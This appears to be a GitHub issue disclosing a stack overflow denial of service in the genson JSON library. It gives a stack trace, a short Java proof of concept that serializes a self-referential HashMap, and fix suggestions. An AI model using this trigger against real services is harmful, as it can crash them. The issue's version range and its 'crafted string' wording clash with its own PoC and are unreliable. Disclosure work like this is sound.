owlike/genson

Stack overflow error caused by genson serialization Map

PoppingSnack opened this issue · 0 comments

Stack overflow error caused by genson serialization Map

Description

genson before v1.6 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at com.owlike.genson.stream.JsonWriter.beginObject(JsonWriter.java:10)
	at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:642)
	at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:620)
	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
	at com.owlike.genson.Genson.serialize(Genson.java:274)
	at com.owlike.genson.convert.DefaultConverters$UntypedConverterFactory$UntypedConverter.serialize(DefaultConverters.java:1005)
	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
	at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:645)
	at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:620)
	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
	at com.owlike.genson.Genson.serialize(Genson.java:274)
	at com.owlike.genson.convert.DefaultConverters$UntypedConverterFactory$UntypedConverter.serialize(DefaultConverters.java:1005)
	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
	at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:645)
	at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:620)
	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
	at com.owlike.genson.Genson.serialize(Genson.java:274)

PoC

        <dependency>
            <groupId>com.owlike</groupId>
            <artifactId>genson</artifactId>
            <version>1.6</version>
        </dependency>
import com.owlike.genson.Genson;

import java.util.HashMap;

public class PoC2 {

    public static void main(String[] args) {
        HashMap<String,Object> map=new HashMap<>();
        map.put("t",map);
        Genson genson = new Genson();
        genson.serialize(map);
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))

References

  1. jettison-json/jettison#52
  2. https://github.com/jettison-json/jettison/pull/53/files